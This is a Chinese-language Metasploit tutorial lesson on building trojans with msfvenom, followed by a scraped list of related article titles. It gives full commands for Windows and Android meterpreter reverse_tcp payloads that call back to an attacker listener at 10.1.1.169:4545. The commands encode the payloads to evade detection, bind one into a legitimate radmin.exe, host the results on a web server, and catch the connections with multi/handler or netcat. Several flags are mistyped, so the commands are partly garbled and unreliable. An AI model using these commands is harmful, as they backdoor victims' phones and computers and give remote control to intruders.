Metasploit进阶第四讲 生成Android  apk文件

01  msfvenom基本参数

msfvenom介绍

承接上回,staged/unstage payload如何利用?

msfvenom是msfpayload及msfencode的结合体,可利用msfvenom将payload封装为木马程序,并在目标机上执行,在本地监听上线。

msfvenom基本参数

msfvenom  -h

-p        ->指定payload

-1        ->列出所有可用项

-f         ->指定文件输出格式

-e        ->指定编码格式

-a        ->选择架构平台

-o        ->选择文件输出路径,包含文件名

-s         ->指定生成的payload最大大小

-b        ->避免使用的字符

-I         ->指定编码次数

-c         ->添加自己的shellcode

-xxxx.exc   -k    ->捆绑文件到xxx.cxc

以下使用msfvenom分别是什么意思?

Msfvenom   -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-e x86/shikata_ga_nai –I 3 –f exe -o abc.exe

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-b ‘\×00xff' –I 3 –f exe -o abc.exe

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-e x86/shikata_ga_nai –k –x /usr/share/windows-binaries/radmin.exe –f exe -o radmin.exe

msfvenom生成apk文件

staged payload:

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

R>/var/www/html/Lliang.apk

metasploit:

use exploit/multi/handler                  加载模块

set payload android/meterpreter/reverse_tcp      选择Payload

set LHOST10.1.1.169这里的地址设置成我

们刚配置木马的IP地址

set LPORT4545这里的端口设置成刚才我们

配置木马所监听的端口

unstage payload:

 

msfvenom  –p  windows/shell_reverse_tcp LHOST=10.1.1.169 LPORT=4545

-f exe –o /var/www/html/shell-stageless.exe

metasploit:

use exploit/multi/handler加载模块

set payload windows/shell_reverse_tcp 选择Payload

unstage payload:

msfvenom  -p  windows/shell reverse_tcp LHOST=10.1.1.169 LPORT=4545     -f exe  -o  /var/www/html/shell-stageless.exe

 netcat:在两台电脑之润建立链接并返回两个数据流

nc  -lyp  4545    -监听4545端口

-v/-vw   显示指令执行过程

-l  使用监听模式,管控传入的资料

-p   设置本地主机使用的通信端口

staged payload不适用于netcat,必须使用Metasploit的exploit/multi/handler模块。要从主机上的metasploit handler上下载完整的payload

6.Metasploit生成apk攻击Android实例的更多相关文章

  1. Kali之Metasploit生成apk后门控制安卓

    扫盲教程,大佬勿喷. 实验中请更改为你环境的IP. 生成apk后门 Kali Linux(Hack):192.168.169.76 Android(靶机):192.168.169.137 启动kali ...

  2. MyEclipse 生成APK文件

    MyEclipse 生成APK文件 Android Tools>Export  Signed  Application Packages. http://jingyan.baidu.com/ar ...

  3. eclipse将android项目生成apk并且给apk签名

    转载:http://www.cnblogs.com/tianguook/archive/2012/09/27/2705724.html 生成apk最懒惰的方法是:只要你运行过android项目,到工作 ...

  4. Android 手机卫士--打包生成apk维护到服务器

    项目打包生成apk过程: 1.生成签名文件,并且指定所在位置 2.使用生成的签名文件,给工程打包生成一个apk 本文地址:http://www.cnblogs.com/wuyudong/p/59033 ...

  5. eclipse下Android无法自动生成apk文件怎么办?

    eclipse下Android无法自动生成apk文件怎么办? 现象:创建android工程后,通过手动build/clean或自动build均无法在bin文件夹下生成.apk文件 解决方法:进入win ...

  6. linux(以ubuntu为例)下Android利用ant自动编译、修改配置文件、批量多渠道,打包生成apk文件

    原创,转载请注明:http://www.cnblogs.com/ycxyyzw/p/4555328.html  之前写过一篇<windows下Android利用ant自动编译.修改配置文件.批量 ...

  7. windows下Android利用ant自动编译、修改配置文件、批量多渠道,打包生成apk文件

    原创文章,转载请注明:http://www.cnblogs.com/ycxyyzw/p/4535459.html android 程序打包成apk,如果在是命令行方式,一般都要经过如下步骤: 1.用a ...

  8. Android实例-实现扫描二维码并生成二维码(XE8+小米5)

    相关资料: 第三方资料太大没法写在博文上,请下载CSDN的程序包. 程序包下载: http://download.csdn.net/detail/zhujianqiangqq/9657186 注意事项 ...

  9. Android 命令行编译、打包生成apk文件

    一.搭建搭建环境 1. 安装JDK 和 Android SDK   2. 配置环境变量 D:\android-sdk-windows\tools C:\Program Files\Java\jdk1. ...

随机推荐

  1. 浅析SIEM、态势感知平台、安全运营中心

    近年来SIEM.态势感知平台.安全运营中心等概念炒的火热,有的人认为这都是安全管理产品,这些产品就是一回事,有人认为还是有所区分.那么到底什么是SIEM.什么是态势感知平台.什么是安全运营中心,他们之 ...

  2. 【OO第三次课下讨论】农场主的饲料分配问题

    需求分析与项目设计   本思考题的设计需求是力图找到一个简单且可行的饲料分配方案,由于不涉及到饲料价格或者是营养均衡之类的优化问题,因此在假设总的饲料量必能满足所有动物的热量需求的前提下,我们只需要采 ...

  3. sublime text3 搭建c++/c环境

    sublime搭建的c++/c使用很方便,实用性很强,自己阅览了无数的博客,csdn,博客园的都看了,最后还是自己摸索着搭建成功了,如果觉得还不错请给个评论谢谢.(提前声明本人专利不允许转载!!!!) ...

  4. nginx显示静态html爆502 bad gateway的错误提示

    在centos的服务器上,没有启动php-fcgi. 本来是想设置显示一个静态文件目录的,用不着php,于是就关闭了php-fcgi. 结果打开爆了一个大大的nginx502 bad gateway的 ...

  5. leetcode面试题42. 连续子数组的最大和

      总结一道leetcode上的高频题,反反复复遇到了好多次,特别适合作为一道动态规划入门题,本文将详细的从读题开始,介绍解题思路. 题目描述示例动态规划分析代码结果 题目   面试题42. 连续子数 ...

  6. 结巴分词demo

    #encoding=utf-8 from __future__ import unicode_literals import sys sys.path.append("../") ...

  7. [转载]Linux服务器丢包故障的解决思路及引申的TCP/IP协议栈理论

    Linux服务器丢包故障的解决思路及引申的TCP/IP协议栈理论 转载至:https://www.sdnlab.com/17530.html 我们使用Linux作为服务器操作系统时,为了达到高并发处理 ...

  8. Robotutor Scratch3.0 在线编程平台升级啦!

    Robotutor推出的Scratch3.0在线编程平台受到很多编程老师和学员的喜爱,上一个版本我们提供了用户注册,找回密码,个人项目的在线保存和浏览,社区分享评论. 我们根据实际的教学需要,用户角色 ...

  9. Asp.net textbox 控件 的 onTextChange 事件

    <asp:TextBox ID="txt_MailType" runat="server" OnTextChanged="exitMailTyp ...

  10. 【简说Python WEB】Web应用部署

    目录 [简说Python WEB]Web应用部署 应用层 缓存层 数据层 Gunicorn 的应用 1.安装Gunicorn 2.Gunicorn的启动 Nginx 的应用 1.docker方式部署安 ...